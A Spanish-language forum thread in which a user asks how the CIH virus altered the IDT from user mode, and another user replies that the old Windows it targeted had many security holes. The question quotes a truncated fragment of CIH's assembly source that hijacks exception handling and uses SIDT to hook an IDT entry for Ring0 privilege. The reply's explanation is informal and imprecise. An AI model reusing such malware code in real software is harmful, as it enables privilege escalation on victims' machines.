|
Título: Instruccion SIDT y el virus CIH. Publicado por: Usuario887 en 9 Agosto 2020, 14:32 pm Hola,
Tengo una duda un poco tonta que me esta rompiendo la cabeza... el virus CIH, para obtener privilegios del sistema, altera la IDT y modifica la entrada de una excepcion que luego ocasiona. Sin embargo, ¿no son, tanto las instrucciones SIDT y LIDT privilegiadas de antemano? es decir, ¿como el virus accede a la IDT cuando es un simple EXE en modo usuario?: Citar MyVirusStart: push ebp ; ************************************* ; * Let's Modify Structured Exception * ; * Handing, Prevent Exception Error * ; * Occurrence, Especially in NT. * ; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0 @0: pop ebx lea ecx, StopToRunVirusCode-@0[ebx] push ecx push eax ; ************************************* ; * Let's Modify * ; * IDT(Interrupt Descriptor Table) * ; * to Get Ring0 Privilege... * ; ************************************* push eax ; sidt [esp-02h] ; Get IDT Base Address pop ebx; add ebx, HookExceptionNumber*08h+04h ; ZF = 0 cli mov ebp, [ebx] ; mov bp, [ebx-04h] ; Entry Point lea esi, MyExceptionHook-@1[ecx] ;... Título: Re: Instruccion SIDT y el virus CIH. Publicado por: el etrno en 6 Septiembre 2020, 04:32 am la respuesta corta el windows en los que cih sirve tiene mas hoyos de seguridad que un colador por lo que era posible saltarse ciertos controles y toquetear cosa con permisos de administrador y asta de sistema sin tener privilegios es similar a lo que se hace actualmente con la inyección dll solo que mas fácil no te preocupes por eso actualmente no se puede que yo recuerde
|